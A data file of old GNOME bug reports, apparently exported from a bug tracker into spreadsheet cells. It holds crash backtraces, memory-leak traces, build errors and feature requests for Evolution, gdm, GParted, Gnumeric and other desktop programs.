TZOFFSETTO:+0200
RRULE:FREQ=YEARLYWKST=MOINTERVAL=1BYMONTH=3BYDAY=-1SU
END:DAYLIGHT
END:VTIMEZONE
BEGIN:VEVENT
DTSTAMP:20011116T154220Z
DTSTARTTZID=GMT +0100 (Standard) / GMT +0200
(Daylight):20011113T140000^M
SUMMARY:Updated: Saturn weekly project meeting - no with recurrence
UID:040000008200E00074C5B7101A82E0080000000050620305536BC101000000000000000
 010000000CE47C0AEB8C60B40B0376E45769E57F3
ATTENDEEROLE=REQ-PARTICIPANTPARTSTAT=NEEDS-ACTIONRSVP=TRUECN=Alexei
Mi
 khailov:MAILTO:removed@removed.com
ATTENDEEROLE=REQ-PARTICIPANTPARTSTAT=NEEDS-ACTIONRSVP=TRUECN=JÃ¸rn
Alb
 rektsen:MAILTO:removed@removed.com
ATTENDEEROLE=REQ-PARTICIPANTPARTSTAT=NEEDS-ACTIONRSVP=TRUECN=Lars
Chri
 stiansen:MAILTO:removed@removed.com
ATTENDEEROLE=REQ-PARTICIPANTPARTSTAT=NEEDS-ACTIONX-REPLYTIME=20011112T08
 2900ZRSVP=TRUECN=Tom Andersen:MAILTO:removed@removed.com
ORGANIZERCN=Poul Bundgaard:MAILTO:removed@removed.com
LOCATION:Konferencerum - 1.sal
DTENDTZID=GMT +0100 (Standard) / GMT +0200
(Daylight):20011113T150000
RRULE:FREQ=WEEKLYINTERVAL=1BYDAY=TUWKST=MO
DESCRIPTION:Weekly project status meeting\N\NMeeting Topics:\NGeneral
statu
 s - (other projects and corporate news)\NPlanning status - Planned
activ
 ities\ resource allocation and changes to or deviations from the
planned.
 \NIndividual status\ input and concerns.\N   - Working activities and
pro
 gress\N   - Issues\N   - Risks\N   - Next weeks activities\N   - Near
term
  milestones/deliverables\NTo-do list.\N\NBest Regards\NPoul\N\N\N
SEQUENCE:0
PRIORITY:5
CLASS:
CREATED:20011116T154225Z
LAST-MODIFIED:20011116T154225Z
STATUS:CONFIRMED
TRANSP:OPAQUE
X-MICROSOFT-CDO-BUSYSTATUS:BUSY
X-MICROSOFT-CDO-INSTTYPE:1
X-MICROSOFT-CDO-INTENDEDSTATUS:BUSY
X-MICROSOFT-CDO-ALLDAYEVENT:FALSE
X-MICROSOFT-CDO-IMPORTANCE:1
BEGIN:VALARM
ACTION:DISPLAY
DESCRIPTION:REMINDER
TRIGGERRELATED=START:-PT00H15M00S
END:VALARM
END:VEVENT
END:VCALENDAR
------_=_NextPart_001_01C16EB5.49C6AA10--
--------------------[cut here]---------------------------------
Debugging Information:
0x40a2b489 in __wait4 () from /lib/libc.so.6
#0  0x40a2b489 in __wait4 () from /lib/libc.so.6
#1  0x40a8948c in __DTOR_END__ () from /lib/libc.so.6
#2  0x402d78e5 in waitpid (pid=10324 stat_loc=0xbffff2a8 options=0)
    at wrapsyscall.c:134
#3  0x4072d7ff in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x402d6522 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 
      edi = 135938288 esi = 144 ebp = 3221222452 esp = 3221222440 
      ebx = 1083640824 edx = 135792376 ecx = 14 eax = 0 trapno = 14 
      err = 4 eip = 1083581193 cs = 35 __csh = 0 eflags = 2163270 
      esp_at_signal = 3221222440 ss = 43 __ssh = 0 fpstate = 0xbffff3a8 
      oldmask = 2147483648 cr2 = 64}) at signals.c:91
#5  0x409b9408 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#6  0x40807eca in gdk_pixbuf_render_to_drawable () at gdk-pixbuf-render.c:158
#7  0x408080cd in gdk_pixbuf_render_to_drawable_alpha ()
    at gdk-pixbuf-render.c:158
#8  0x4033ddec in draw_pixmap (painter=0x815b7a0 pixbuf=0x8179b20 x=14 
    y=14 scale_width=48 scale_height=48 color=0x0) at htmlgdkpainter.c:918
#9  0x40346e8f in html_painter_draw_pixmap () at htmlpainter.c:469
#10 0x4033f931 in draw (o=0x8179020 painter=0x815b7a0 x=-14 y=-14 
    width=600 height=400 tx=14 ty=62) at htmlimage.c:430
#11 0x403438cc in html_object_draw () at htmlobject.c:597
#12 0x4031d58c in draw (o=0x8179ab8 p=0x815b7a0 x=-10 y=-10 width=600 
    height=400 tx=14 ty=14) at htmlclue.c:222
#13 0x4031ff08 in draw (self=0x8179ab8 painter=0x815b7a0 x=-10 y=-10 
    width=600 height=400 tx=10 ty=10) at htmlclueflow.c:1145
#14 0x403438cc in html_object_draw () at htmlobject.c:597
#15 0x4031d58c in draw (o=0x8177b08 p=0x815b7a0 x=-10 y=-10 width=600 
    height=400 tx=10 ty=10) at htmlclue.c:222
#16 0x403238a7 in draw (o=0x8177b08 p=0x815b7a0 x=-10 y=-10 width=600 
    height=400 tx=10 ty=10) at htmlcluev.c:335
#17 0x40351232 in draw (o=0x8177b08 p=0x815b7a0 x=-10 y=-10 width=600 
    height=400 tx=10 ty=10) at htmltablecell.c:175
#18 0x403438cc in html_object_draw () at htmlobject.c:597
#19 0x4034e249 in draw (o=0x8177a28 p=0x815b7a0 x=-10 y=-10 width=600 
    height=400 tx=10 ty=10) at htmltable.c:1170
#20 0x403438cc in html_object_draw () at htmlobject.c:597
#21 0x4031d58c in draw (o=0x81816f8 p=0x815b7a0 x=-10 y=-10 width=600 
    height=400 tx=10 ty=10) at htmlclue.c:222
#22 0x4031ff08 in draw (self=0x81816f8 painter=0x815b7a0 x=-10 y=-10 
    width=600 height=400 tx=10 ty=10) at htmlclueflow.c:1145
#23 0x403438cc in html_object_draw () at htmlobject.c:597
#24 0x4031d58c in draw (o=0x8176dd8 p=0x815b7a0 x=-10 y=-10 width=600 
    height=400 tx=10 ty=10) at htmlclue.c:222
#25 0x403238a7 in draw (o=0x8176dd8 p=0x815b7a0 x=-10 y=-10 width=600 
    height=400 tx=10 ty=10) at htmlcluev.c:335
#26 0x403438cc in html_object_draw () at htmlobject.c:597
#27 0x40338e4a in html_engine_draw_real (e=0x815b5c8 x=0 y=0 width=600 
    height=400) at htmlengine.c:3908
#28 0x40338ec9 in html_engine_draw () at htmlengine.c:3920
#29 0x40338a93 in html_engine_update_event (e=0x815b5c8) at htmlengine.c:3719
#30 0x40985948 in g_idle_dispatch (source_data=0x403388bc 
    dispatch_time=0xbffffa88 user_data=0x815b5c8) at gmain.c:1367
#31 0x409849f6 in g_main_dispatch (dispatch_time=0xbffffa88) at gmain.c:656
#32 0x40984fb1 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#33 0x40985129 in g_main_run () at gmain.c:884
#34 0x408a148a in gtk_main () at gtkmain.c:220
#35 0x403fa182 in bonobo_main () at bonobo-main.c:95
#36 0x80a9ff0 in main (argc=3 argv=0xbffffb34) at main.c:156
#0  0x40a2b489 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40a8948c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x402d78e5 in waitpid (pid=10324 stat_loc=0xbffff2a8 options=0)
    at wrapsyscall.c:134
stat_loc = (int *) 0xbffff2a8
options = 0
result = 0
oldtype = 0
#3  0x4072d7ff in gnome_segv_handle (signum=11) at gnome-init.c:659
estatus = 1084789900
in_segv = 1
pid = 0
#4  0x402d6522 in pthread_sighandler (signo=11 ctx={gs = 0 __gsh = 0 
      fs = 0 __fsh = 0 es = 43 __esh = 0 ds = 43 __dsh = 0 
      edi = 135938288 esi = 144 ebp = 3221222452 esp = 3221222440 
      ebx = 1083640824 edx = 135792376 ecx = 14 eax = 0 trapno = 14 
      err = 4 eip = 1083581193 cs = 35 __csh = 0 eflags = 2163270 
      esp_at_signal = 3221222440 ss = 43 __ssh = 0 fpstate = 0xbffff3a8 
      oldmask = 2147483648 cr2 = 64}) at signals.c:91
self = 0x402dd6c0
in_sighandler = 0x0
#5  0x409b9408 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#6  0x40807eca in gdk_pixbuf_render_to_drawable () at gdk-pixbuf-render.c:158
No locals.
#7  0x408080cd in gdk_pixbuf_render_to_drawable_alpha ()
    at gdk-pixbuf-render.c:158
158	in gdk-pixbuf-render.c
No locals.
Unknown priority 5. Setting to default priority Normal.
Unknown reporter: ami@avanticore.com changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>ami</t>
  </si>
  <si>
    <t>GSTREAMER-334700</t>
  </si>
  <si>
    <t>[qtdemux] Memory leaks</t>
  </si>
  <si>
    <t>It looks like qtdemux doesn't properly handle creating its pads. The attached patch is an attempt to correct this.</t>
  </si>
  <si>
    <t>LSR-398535</t>
  </si>
  <si>
    <t>Repeated opening/closing of setting dialog throws exception</t>
  </si>
  <si>
    <t>Repeated opening/closing of setting dialog throws exception in manageNamedTask.  Find reason for following exception:
 File /usr/local/lib/python2.4/site-packages/lsr/Tier.py line 662 in manageNamedTask
    if perk.preExecute(layer por):
AttributeError: 'NoneType' object has no attribute 'preExecute'</t>
  </si>
  <si>
    <t>EVOLUTION-218853</t>
  </si>
  <si>
    <t>Unfortunate term in manpage</t>
  </si>
  <si>
    <t>Evolution manual page starts from the following:
----------------------------------------------------------
evolution  -  Run  Ximian  Evolution  the GNOME groupware
       suite.
SYNOPSIS
       evolution [OPTION] ... [URI]
DESCRIPTION
       This program is a graphical groupware  suite.  
       Documentation for evolution is available (...)
----------------------------------------------------------
In my opinion the term 'graphical groupware suite' is rather 
unfortunate technical and unclear for the typical user. 
I would rather write something like that (as I am not native
English speaker I could make some mistakes):
----------------------------------------------------------
evolution - sophisticated mailer calendar and task editor
 	working in GNOME environment
(...)
DESCRIPTION
	XIMIAN evolution is a mailing/calendaring software
working in GNOME environment functionally similar to Microsoft 
Outlook (TM) . Evolution can be used to send and read mail
edit ToDo-lists handle calendar and edit contact lists. Complete
documentation is available (...) 
----------------------------------------------------------
This way the user who accidentally reads the manpage gets basic 
understanding of the application purpose. The term 'graphical
groupware' can only confuse the reader.
It would be also probably a good idea to extend the manpage 
with some crucial information (like pointing that evolution can handle
multiple mail accounts using local folders POP3 and IMAP - with SSL
that it can use LDAP etc) but this is less important.</t>
  </si>
  <si>
    <t>GNOME-CORE-53794</t>
  </si>
  <si>
    <t>gweather segfault</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  0.4
Synopsis: gweather segfault
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
While setting the weather location for the applet not only did it not
retrieve the proper city information it also gave me a segfault.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0x405815a9 in __wait4 () from /lib/libc.so.6
#0  0x405815a9 in __wait4 () from /lib/libc.so.6
#1  0x405eb824 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40110b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x402b9118 in gtk_type_check_object_cast () from /usr/lib/libgtk-1.2.so.0
#5  0x8049dca in fetch_forecast_image_url ()
#6  0x4028fc0a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#7  0x4028ef4d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#8  0x4028ccf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#9  0x400eadd8 in gnome_dialog_button_clicked () from /usr/lib/libgnomeui.so.32
#10 0x4025d8b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#11 0x4028fc0a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#12 0x4028f09d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#13 0x4028ccf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x401f59fd in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#15 0x401f725d in gtk_real_button_released () from /usr/lib/libgtk-1.2.so.0
#16 0x4025d8b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#17 0x4028edd8 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#18 0x4028ccf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#19 0x401f592d in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#20 0x401f6b47 in gtk_button_button_release () from /usr/lib/libgtk-1.2.so.0
#21 0x4025d57e in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#22 0x4028ef8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#23 0x4028ccf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#24 0x402c6c39 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#25 0x4025d4f5 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#26 0x4025c5bf in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#27 0x40311c21 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#28 0x404b4987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#29 0x404b5001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#30 0x404b51cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#31 0x4025be57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#32 0x400ea44d in gnome_dialog_run_real () from /usr/lib/libgnomeui.so.32
#33 0x400ea561 in gnome_dialog_run_and_close () from /usr/lib/libgnomeui.so.32
#34 0x804a244 in fetch_forecast_image_url ()
#35 0x107e8 in ?? ()
#0  0x405815a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405eb824 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40110b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  0x402b9118 in gtk_type_check_object_cast () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#5  0x8049dca in fetch_forecast_image_url ()
No symbol table info available.
#6  0x4028fc0a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x4028ef4d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-04-27 20:44 -------
The original reporter (whartwel@zianet.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>whartwel</t>
  </si>
  <si>
    <t>EEL-307268</t>
  </si>
  <si>
    <t>Leak in eel-mime-application-chooser.c</t>
  </si>
  <si>
    <t>==8732== 19 bytes in 1 blocks are definitely lost in loss record 8215 of 20645
==8732==    at 0x1B909222: malloc (vg_replace_malloc.c:130)
==8732==    by 0x1C4E8F55: g_malloc (gmem.c:137)
==8732==    by 0x1C4F9531: g_strdup (gstrfuncs.c:91)
==8732==    by 0x1BA334BA: eel_mime_application_chooser_new
(eel-mime-application-chooser.c:505)
==8732==    by 0x80A4B16: is_directory_ready_callback (fm-properties-window.c:3345)
==8732==    by 0x1B939D32: ready_callback_call (nautilus-directory-async.c:1262)
==8732==    by 0x1B93B29F: nautilus_directory_async_state_changed
(nautilus-directory-async.c:1854)
==8732==    by 0x1B93DA9D: nautilus_directory_call_when_ready_internal
(nautilus-directory-async.c:1344)
==8732==    by 0x1B97A3C9: vfs_file_call_when_ready (nautilus-vfs-file.c:66)
==8732==    by 0x1B953A4F: nautilus_file_call_when_ready (nautilus-file.c:5455)
==8732==    by 0x80A528F: fm_properties_window_present (fm-properties-window.c:3697)
==8732==    by 0x8087115: action_properties_callback (fm-directory-view.c:1150)
==8732==    by 0x1C4914AC: g_cclosure_marshal_VOID__VOID (gmarshal.c:77)
==8732==    by 0x1C4852FB: g_closure_invoke (gclosure.c:437)
==8732==    by 0x1C494A7E: signal_emit_unlocked_R (gsignal.c:2488)
==8732==    by 0x1C49605A: g_signal_emit_valist (gsignal.c:2247)
==8732==    by 0x1C4963E2: g_signal_emit (gsignal.c:2291)
==8732==    by 0x1BD03D09: _gtk_action_emit_activate (gtkaction.c:1038)
==8732==    by 0x1BD041E8: gtk_action_activate (gtkaction.c:1065)
==8732==    by 0x1C4914AC: g_cclosure_marshal_VOID__VOID (gmarshal.c:77)
==8732==    by 0x1C4852FB: g_closure_invoke (gclosure.c:437)
==8732==    by 0x1C494A7E: signal_emit_unlocked_R (gsignal.c:2488)
==8732==    by 0x1C49605A: g_signal_emit_valist (gsignal.c:2247)
==8732==    by 0x1C4963E2: g_signal_emit (gsignal.c:2291)
==8732==    by 0x1BEB369D: gtk_widget_activate (gtkwidget.c:3734)
==8732==    by 0x1BDE2AD0: gtk_menu_shell_activate_item (gtkmenushell.c:1034)
==8732==    by 0x1BDE2D95: gtk_menu_shell_button_release (gtkmenushell.c:640)
==8732==    by 0x1BDD81F1: gtk_menu_button_release (gtkmenu.c:2567)
==8732==    by 0x1BDD236C: _gtk_marshal_BOOLEAN__BOXED (gtkmarshalers.c:83)
==8732==    by 0x1C484E28: g_type_class_meta_marshal (gclosure.c:514)
Seems details-&gt;real_mime_type is not being freed in the -&gt;finalize method?</t>
  </si>
  <si>
    <t>SAWFISH-48409</t>
  </si>
  <si>
    <t>Can't decrease number of workspaces from capplet</t>
  </si>
  <si>
    <t xml:space="preserve">https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=17674
------- Additional Comments From jsh@pixelslut.com 2001-08-23 21:15:22 ----
This was fixed in 0.99
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
</t>
  </si>
  <si>
    <t>GNUMERIC-305798</t>
  </si>
  <si>
    <t>Support VOLATILE functions.</t>
  </si>
  <si>
    <t>I have to perform a manual refresh (with the F9 key) every time I open a
spreadsheet which uses the today() function to get the current day's date. It
would be easier if this was automatically calculated and refreshed if necessary
upon opening the spreadsheet.
Other information:</t>
  </si>
  <si>
    <t>yobbobandana</t>
  </si>
  <si>
    <t>GPARTED-529063</t>
  </si>
  <si>
    <t>I need some context to translate these strings:
#: ../src/Dialog_Disklabel.cc:81
Choosing 
#: ../src/Dialog_Disklabel.cc:86
 will
#. TO TRANSLATORS: looks like IMMEDIATELY ERASE ALL DATA on disk /dev/hda
#: ../src/Dialog_Disklabel.cc:89
IMMEDIATELY ERASE ALL DATA on disk %1
I'm not sure but these looks like they form part of a unique string which is not very good translatable.</t>
  </si>
  <si>
    <t>EVOLUTION-201964</t>
  </si>
  <si>
    <t>Elm importer false positive</t>
  </si>
  <si>
    <t>Evolution claims that I have Elm files but I don't. It's probably confused
by my MH files. I'm not sure if there's a way to say for sure that a Mail
directory is an Elm mail directory but if it contains a file called context
and a subdirectory called inbox it's pretty likely to be MH.</t>
  </si>
  <si>
    <t>GNOME-UTILS-150958</t>
  </si>
  <si>
    <t>gfloppy</t>
  </si>
  <si>
    <t>problems compiling when kernel 2.6.7 header files are used</t>
  </si>
  <si>
    <t>make[1]: Entering directory
`/home/lupus/garnome--kenny/garnome/desktop/gnome-utils/work/main.d/gnome-utils-2.7.90/gfloppy/src'
if cc -DHAVE_CONFIG_H -I. -I. -I../..
-DGNOMELOCALEDIR=\/garnome/share/locale\
-DGLADEDIR=\/garnome/share/gnome-utils/glade\ -DDATADIR=\/garnome/share\
-DORBIT2=1 -pthread -I/garnome/include/gtk-2.0 -I/garnome/lib/gtk-2.0/include
-I/garnome/include/atk-1.0 -I/garnome/include/pango-1.0 -I/usr/X11R6/include
-I/usr/include/freetype2 -I/usr/include/freetype2/config
-I/garnome/include/glib-2.0 -I/garnome/lib/glib-2.0/include
-I/garnome/include/libgnome-2.0 -I/garnome/include/orbit-2.0
-I/garnome/include/libbonobo-2.0 -I/garnome/include/gconf/2
-I/garnome/include/gnome-vfs-2.0 -I/garnome/lib/gnome-vfs-2.0/include
-I/garnome/include/bonobo-activation-2.0 -I/garnome/include/libgnomeui-2.0
-I/garnome/include/libgnomecanvas-2.0 -I/garnome/include/libart-2.0
-I/garnome/include/libbonoboui-2.0 -I/garnome/include/libxml2  
-I/garnome/include/libglade-2.0 -I/garnome/include/gtk-2.0
-I/garnome/include/libxml2 -I/garnome/lib/gtk-2.0/include
-I/garnome/include/atk-1.0 -I/garnome/include/pango-1.0 -I/usr/X11R6/include
-I/usr/include/freetype2 -I/usr/include/freetype2/config
-I/garnome/include/glib-2.0 -I/garnome/lib/glib-2.0/include   
-I/garnome/include -I/usr/X11R6/include  -g -I/garnome/include
-I/usr/X11R6/include -L/garnome/lib -L/usr/X11R6/lib -O2 -pipe -MT fdformat.o
-MD -MP -MF .deps/fdformat.Tpo \
  -c -o fdformat.o `test -f 'fdformat.c' || echo './'`fdformat.c \
then mv .deps/fdformat.Tpo .deps/fdformat.Po \
else rm -f .deps/fdformat.Tpo exit 1 \
fi
In file included from fdformat.c:19:
/usr/include/linux/fd.h:342: error: variable or field `__user' declared void
/usr/include/linux/fd.h:342: error: parse error before '*' token
/usr/include/linux/fd.h:360: error: parse error before '}' token
make[1]: *** [fdformat.o] Error 1
make[1]: Leaving directory
`/home/lupus/garnome--kenny/garnome/desktop/gnome-utils/work/main.d/gnome-utils-2.7.90/gfloppy/src'
make: *** [all-recursive] Error 1
root@lupus:/home/lupus/garnome--kenny/garnome/desktop/gnome-utils/work/main.d/gnome-utils-2.7.90/gfloppy#
is this a problem in the header files or in the program?
using kernel 2.6.7
other programmes seem to have problems too:
http://www.linuxquestions.org/questions/showthread.php?s=&amp;forumid=2&amp;threadid=211730</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-450960</t>
  </si>
  <si>
    <t>crash in Deskbar: Nothing computer idle.</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
Nothing computer idle.
Distribution: Ubuntu 7.04 (feisty)
Gnome Release: 2.18.1 2007-04-11 (Ubuntu)
BugBuddy Version: 2.18.1
System: Linux 2.6.21.1.sp7 #1 SMP Tue May 15 13:29:07 BST 2007 x86_64
X Vendor: The X.Org Foundation
X Vendor Release: 70200000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Bluecurve
Icon Theme: Human
Memory status: size: 0 vsize: 0 resident: 0 share: 0 rss: 0 rss_rlim: 0
CPU usage: start_time: 0 rtime: 0 utime: 0 stime: 0 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 0
----------- .xsession-errors (643939 sec old) ---------------------
ALSA lib confmisc.c:391:(snd_func_concat) error evaluating strings
ALSA lib conf.c:3500:(_snd_config_evaluate) function snd_func_concat returned error: No such device
ALSA lib confmisc.c:1070:(snd_func_refer) error evaluating name
ALSA lib conf.c:3500:(_snd_config_evaluate) function snd_func_refer returned error: No such device
ALSA lib conf.c:3968:(snd_config_expand) Evaluate error: No such device
ALSA lib pcm.c:2145:(snd_pcm_open_noupdate) Unknown PCM default
ALSA lib confmisc.c:670:(snd_func_card_driver) cannot find card '0'
ALSA lib conf.c:3500:(_snd_config_evaluate) function snd_func_card_driver returned error: No such device
ALSA lib confmisc.c:391:(snd_func_concat) error evaluating strings
ALSA lib conf.c:3500:(_snd_config_evaluate) function snd_func_concat returned error: No such device
ALSA lib confmisc.c:1070:(snd_func_refer) error evaluating name
ALSA lib conf.c:3500:(_snd_config_evaluate) function snd_func_refer returned error: No such device
ALSA lib conf.c:3968:(snd_config_expand) Evaluate error: No such device
...Too much output ignoring rest...
--------------------------------------------------
Traceback (most recent call last):
  File /usr/lib/deskbar-applet/handlers/epiphany.py line 73 in 
    self.watcher.connect('changed' lambda watcher f: self.watch_callback())
  File /usr/lib/deskbar-applet/handlers/epiphany.py line 84 in 
    EpiphanyHandler.__init__(self EPHY_BOOKMARKS_FILE lambda: self._parse_bookmarks(True))
  File /usr/lib/deskbar-applet/handlers/epiphany.py line 93 in _parse_bookmarks
    parser = EpiphanyBookmarksParser(self favicon_cache)
  File /usr/lib/deskbar-applet/handlers/epiphany.py line 157 in __init__
    self._index_bookmarks()
  File /usr/lib/deskbar-applet/handlers/epiphany.py line 175 in _index_bookmarks
    parser.parse(EPHY_BOOKMARKS_FILE)
  File /usr/lib/python2.5/site-packages/_xmlplus/sax/expatreader.py line 109 in parse
    xmlreader.IncrementalParser.parse(self source)
  File /usr/lib/python2.5/site-packages/_xmlplus/sax/xmlreader.py line 125 in parse
    self.close()
  File /usr/lib/python2.5/site-packages/_xmlplus/sax/expatreader.py line 226 in close
    self.feed( isFinal = 1)
  File /usr/lib/python2.5/site-packages/_xmlplus/sax/expatreader.py line 220 in feed
    self._err_handler.fatalError(exc)
  File /usr/lib/python2.5/site-packages/_xmlplus/sax/handler.py line 38 in fatalError
    raise exception
SAXParseException: /home/jpg35/.gnome2/epiphany/bookmarks.rdf:1:0: no element found</t>
  </si>
  <si>
    <t>GDM-441663</t>
  </si>
  <si>
    <t>gdm crashes with SIGSEGV in add_auth_entry()</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/gdm/+bug/116392
Binary package hint: gdm
gdm as of updating gutsy to the latest is crashing on me. The stack trace of the crash is:
...
Interesting. Here's the new stacktrace:
(gdb) where
#0 0x08076a5d in add_auth_entry (d=0x80ed300 authlist=0xbf88758c af=0x0 af2=0x0 family=0 addr=0x4  addrlen=4) at auth.c:112
#1 0x08077402 in add_auth_entry_for_addr (d=0x80ed300 authlist=0xbf88758c ss=0x0) at auth.c:340
#2 0x080779fc in get_local_auths (d=0x80ed300) at auth.c:474
#3 0x08077f96 in gdm_auth_user_add (d=0x80ed300 user=1001 homedir=0x80ed4db /home/brian) at auth.c:561
#4 0x0806a894 in gdm_slave_session_start () at slave.c:4219
#5 0x080628f8 in gdm_slave_run (display=0x80ed300) at slave.c:1591
#6 0x080615da in gdm_slave_start (display=0x80ed300) at slave.c:892
#7 0x0805eb3d in gdm_display_manage (d=0x80ed300) at display.c:398
#8 0x0804f70c in gdm_start_first_unborn_local (delay=0) at gdm.c:266
#9 0x080527b5 in main (argc=1 argv=0xbf888294) at gdm.c:1832
And here's the problem:
 if (SERVER_IS_LOCAL (d) &amp;&amp; ! added_lo &amp;&amp; ! d-&gt;tcp_disallowed) {
  struct sockaddr_storage *lo_ss = NULL
  /* FIXME: get loobback ss */
  if (! add_auth_entry_for_addr (d &amp;auths lo_ss)) {
   goto get_local_auth_error
  }
 }
in get_local_auths(). lo_ss == NULL is passed to add_auth_entry_for_addr() which doesn't even test it for NULL and starts using it and ends up assigning one if it's members to addr which ends up being used in a memcpy. Bad.
...
I was just about to dig in and get to the root of this problem and saw didier's post. Indeed disabling TCP solves my crash too. I do like my X server listening on the TCP socket though.
...</t>
  </si>
  <si>
    <t>EVOLUTION-252120</t>
  </si>
  <si>
    <t>Clicked on arrow in foldert tree beside Inbox evolution exited</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
In the folder tree I clicked on the arrow next the IMAP inbox to collapse
the folders under the Inbox. Evolution exited with:
Cannot find user-level thread for LWP 11432: generic error
I was running evolution undier gdb and during the session had created and
deleted IMAP folders. I could not get a back trace
Additional Information:
Output from evolution
--------------------------------------------------------------------------
(evolution-1.5:11429): Bonobo-WARNING **: Could not find GNOME pixmap file
/usr/share/pixmaps/web-support-16.png
(evolution-1.5:11429): Gtk-WARNING **: gtk_scrolled_window_add(): cannot
add non scrollable widget use gtk_scrolled_window_add_with_viewport() instead
(evolution-1.5:11429): Bonobo-WARNING **: Could not find GNOME pixmap file
/usr/share/pixmaps/web-support-16.png
camel_junk_plugin_check_junk
em_junk_sa_check_junk
junk filter =&gt; clean
camel_junk_plugin_check_junk
em_junk_sa_check_junk
junk filter =&gt; clean
camel_junk_plugin_check_junk
em_junk_sa_check_junk
junk filter =&gt; clean
(evolution-1.5:11429): Bonobo-WARNING **: Could not find GNOME pixmap file
/usr/share/pixmaps/web-support-16.png
(evolution-1.5:11429): Bonobo-WARNING **: Could not find GNOME pixmap file
/usr/share/pixmaps/web-support-16.png
camel_junk_plugin_check_junk
em_junk_sa_check_junk
junk filter =&gt; clean
/usr/bin/evolution-1.5: relocation error:
/usr/lib/evolution/1.5/components/libevolution-mail.so: undefined symbol:
em_folder_tree_queue_save_state
[New Thread 311316 (LWP 11570)]
[New Thread 327701 (LWP 11571)]
[Thread 311316 (LWP 11570) exited]
[New Thread 344086 (LWP 11572)]
[Thread 327701 (LWP 11571) exited]
[Thread 344086 (LWP 11572) exited]
[New Thread 360471 (LWP 11793)]
[Thread 360471 (LWP 11793) exited]
[New Thread 376856 (LWP 11795)]
[Thread 376856 (LWP 11795) exited]
[New Thread 393241 (LWP 11797)]
[Thread 393241 (LWP 11797) exited]
[New Thread 409626 (LWP 12125)]
/tmp/dev.gdb:1: Error in sourced command file:
Cannot find user-level thread for LWP 11432: generic error
output from e-d-s
-------------------------------------------------------------------------
value = Bangalore
e_contact_set (0x814f4d8 35 0x81500d8)
adding new ORG
attr = telephoneNumber info = 0x806aab0
e_contact_set (0x814f4d8 15 0x81500c8)
e_contact_set (0x814f4d8 1 0x8150ec8)
attr = uid info = (nil)
attr = objectClass info = (nil)
attr = uidNumber info = (nil)
attr = gidNumber info = (nil)
attr = loginShell info = (nil)
attr = homeDirectory info = (nil)
attr = gecos info = (nil)
attr = cn info = 0x806aa40
value = asarfraaz
e_contact_set (0x814f4d8 3 0x81515b8)
adding new FN
attr = sn info = 0x806aa5c
attr = mailacceptinggeneralid info = (nil)
attr = mail info = 0x806aa78
e_contact_set (0x814f4d8 7 0x81513c0)
attr = mailowner info = (nil)
attr = maildrop info = (nil)
e_contact_set (0x814f4d8 1 0x8151558)
